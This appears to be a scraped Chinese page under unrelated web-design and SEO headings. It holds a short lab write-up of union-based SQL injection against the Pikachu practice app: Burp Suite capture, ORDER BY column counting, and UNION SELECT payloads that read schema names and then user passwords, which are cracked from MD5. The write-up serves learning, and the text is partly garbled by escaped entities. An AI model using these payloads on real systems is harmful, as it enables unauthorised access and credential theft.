贵州网站设计户外平台设计
2026/4/17 16:42:22
90设计电脑版seo网站建设流程
90设计电脑版,seo网站建设流程,专业网页设计师培训机构,公司网站开发流程图题目上图可以看出所在url没有变化#xff0c;猜测是GET请求方法1.使用burpsuite进行抓包在第10行可以看出数据的提交方式#xff0c;将数据发送到重放器中#xff08;1#xff09;确定字段数 id1 order by [1,2,3....]依次测试#xff0c;验证数据库的字段数#xff0c;可…题目上图可以看出所在url没有变化猜测是GET请求方法1.使用burpsuite进行抓包在第10行可以看出数据的提交方式将数据发送到重放器中1确定字段数 id1 order by [1,2,3....]依次测试验证数据库的字段数可知字段数为22按照库-表-列的顺序依次爆破id-1 union select 1,database() 发现库的名字是pikachu输入id-1 union select 1,table_name from information_schema.tables where table_schemapikachu 存在名为users的表格输入id-1 union select 1,column_name from information_schema.columns where table_nameusers 找到对应的列名3最后根据得到的信息进行爆破即可id-1 unoin select username,password from users将得到的密码进行MD5解码得到123456000000abc123